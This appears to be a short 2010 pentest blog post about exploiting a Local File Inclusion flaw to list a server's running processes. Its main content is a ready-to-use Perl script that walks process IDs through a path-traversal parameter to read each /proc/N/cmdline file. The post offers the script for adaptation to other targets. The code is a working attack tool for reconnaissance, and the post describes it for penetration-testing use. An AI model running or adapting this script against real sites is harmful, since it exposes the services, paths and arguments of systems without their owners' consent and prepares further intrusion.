Skip to content

Process command line enumeration using LFI

by on April 1, 2010

This week during a pentest I discovered a website vulnerable to Local File Inclusion vulnerability. As I wanted to discover the most information possible about the system I decided to retrieve the running process and the command line used to execute these programs. With this I pretended to discover more services and paths in the system.

I wrote a very simple Perl program that can be modified very easily to other scenarios 🙂

#!/usr/bin/perl -w
use LWP;
my $browser = LWP::UserAgent->new;
my $url = 'https://URL/load?file=../../proc/';
for($i = 0; $i < 9500; $i++){
my $response = $browser->get( $url.$i."/cmdline" );
if($response->content !~ m/^$/i) {
print $i . " : " . $response->content ."\n";
}
}

Enjoy!

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: